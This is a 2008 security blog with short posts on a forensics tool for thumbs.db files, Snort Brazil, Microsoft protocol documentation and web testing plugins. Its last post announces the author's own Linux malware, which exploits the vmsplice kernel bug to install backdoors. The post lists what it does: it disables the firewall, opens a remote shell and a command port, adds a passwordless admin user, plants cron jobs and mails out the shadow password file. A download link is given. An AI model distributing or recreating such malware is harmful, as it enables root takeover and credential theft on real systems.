Monday, June 09, 2008

Palestra de Segurança de Redes de Computadores

Segue abaixo um link para uma apresentação que usei em uma palestra na escola Coopam aqui de Orlândia. Esta palestra foi ministrada para os universitários dos cursos de Sistemas de Informação e Administração de Empresas. Falei sobre tópicos básicos do assunto, técnicas de ataques e mecanismos de defesa.

Link:
http://rapidshare.com/files/121181348/seguranca.pdf.html

Thursday, April 10, 2008

Examining thumbs.db files with Vinetto

Vinetto is a forensics tool to examine Thumbs.db files.
It is a command line python script that works on Linux, Mac OS X and Cygwin(win32).
The Windows systems (98, ME, 2000, XP and 2003 Server) can store thumbnails and metadata of the picture files contained in the directories of its FAT32 or NTFS filesystems.
The thumbnails and associated metadata are stored in Thumbs.db files.
The Thumbs.db files are undocumented OLE structured files.

Once a picture file has been deleted from the filesystem, the related thumbnail and associated metada remain stored in the Thumbs.db file. So, the data contained in those thumbs.db files are an helpful source of information for the forensics investigator.Vinetto extracts the thumbnails and associated metadata from the Thumbs.db files...

Link: http://vinetto.sourceforge.net/

Friday, March 28, 2008

Interactive Firewalls?

Really, its a great idea to improve users experience with Linux!

Link: Interactive Firewalls

Thursday, March 27, 2008

Firefox Web Application Testing Tools

Lightweight and portable is always a benefit for web application exploitation tools. Take a look at this open-source plugin for Firefox and see how it fares against today's web applications.

Link:
Darknet.org

Tuesday, March 25, 2008

Snort-BR Updated

New site of Snort Brazilian Community!!!!

Link: http://www.snort.org.br

Monday, February 25, 2008

Microsoft started a Protocols Program

Microsoft has started a Protocols Program. This project includes thousands of pages of documentation (in .pdf format) divided into categories like Microsoft Communications Protocol Program (MCPP, for "server software that interoperates with Windows desktop operating systems") and Microsoft [Work Group] Server Protocol Program (WSPP, for "server software that interoperates with Microsoft Windows server and desktop operating systems to provide file, print, and user and group administration services"). I am frankly astounded by the number of documents available. Windows_Communication_Protocols.zip and Windows_Server_Protocols.zip are 314 MB total. Documentation like this is a boon for those who develop protocol analyzers, network security inspection systems, and filtering products. Security analysts and reverse engineers will also like to read this material.

Tuesday, February 19, 2008

SARA Linux Malware

Hi all!
I released today a basic malware for to exploit the vmsplice bug on Linux kernel.
This program use the vulnerability for install some backdoors on system.

UPDATED
Actions:
- disable INPUT rules on firewall
- open the 1407 port for execute remote commands
- open a bash session on 14071 port using the xinetd daemon
- add a admin user without password
- schedule malicious tasks on cron
- mail the shadow file for a mail account

Vulnerables systems: Linux 2.6.17 - 2.6.24.1

Warning:
THIS IS A MALWARE. DON'T RUN IT IF YOU DON'T KNOW
WHAT YOU ARE DOING.

Download:
http://coarseknocking.sourceforge.net/sara/sara-malware-0.0.2.tar.gz